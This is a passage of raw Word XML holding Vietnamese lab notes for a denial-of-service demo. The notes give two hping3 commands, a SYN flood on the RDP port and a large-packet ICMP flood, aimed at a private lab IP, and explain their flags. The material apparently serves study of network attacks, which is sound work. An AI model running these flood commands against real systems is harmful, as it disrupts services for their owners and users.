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30C3" w14:textId="6BA6BC44" w:rsidR="00A474D2" w:rsidRDefault="00F251A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Demo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tấn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>công</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bằng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ping of Death</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76916A2C" w14:textId="7E605808" w:rsidR="00616824" w:rsidRDefault="00616824">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hping3 -S -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> u1 -p 3389 192.168.153.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298D9C9" w14:textId="1DE86DFA" w:rsidR="00F251A7" w:rsidRDefault="00F251A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hping3 192.168.153.130 -1 -d 65000 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> u1 -V -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFDFB1" w14:textId="59C57B44" w:rsidR="00B05493" w:rsidRDefault="00B05493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0816C430" w14:textId="58B39FB8" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="424242"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hping3 là một ứng dụng đầu cuối dành cho </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_self" w:tooltip="Linux" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="E64946"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Linux</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="424242"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cho phép gửi các gói TCP, UDP và RAW-IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E13C2" w14:textId="592EB8DB" w:rsidR="00B05493" w:rsidRDefault="00B05493">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cổng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> port mặc định của remote desktop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>là 3389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, việc thay đổi port remote desktop nghĩa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> thay đổi mã số này để tăng tính bảo mật, hạn chế khả năng người ngoài có thể truy cập vào các dữ liệu trong máy tính.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663D9F72" w14:textId="77777777" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493" w:rsidP="00B05493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1320"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thời</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gian</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chờ</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thời</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gian</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chờ</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uX</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cho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> X micro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giây</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ví</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dụ</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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> u1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651AC79B" w14:textId="77777777" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493" w:rsidP="00B05493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2640"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>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Bí</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danh</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nhanh</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cho</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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> u10000 (10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gói</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mỗi</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giây</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F68746D" w14:textId="77777777" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493" w:rsidP="00B05493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2640"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>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Bí</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danh</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nhanh</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hơn</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cho</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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> u1000 (100 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gói</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mỗi</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giây</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754761BF" w14:textId="20E830F4" w:rsidR="00B05493" w:rsidRDefault="00B05493" w:rsidP="00B05493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2640"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">–Flood </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gửi</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gói</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhanh</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nhất</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có</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thể</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không</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hiển</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thị</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phản</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hồi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AACB93" w14:textId="0ADB6618" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493" w:rsidP="00B05493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">u1 = 100000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gói</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mỗi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giây</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71210D77" w14:textId="77777777" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493" w:rsidP="00B05493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-n –numeric </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đầu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>với</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số</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6402B9C1" w14:textId="77777777" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493" w:rsidP="00B05493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-V – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chế</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độ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tiết</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để</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gỡ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B05493">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lỗi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33C2BCEB" w14:textId="76B77AF9" w:rsidR="002F4B32" w:rsidRPr="002F4B32" w:rsidRDefault="002F4B32" w:rsidP="002F4B32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-S –syn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đặt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cờ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
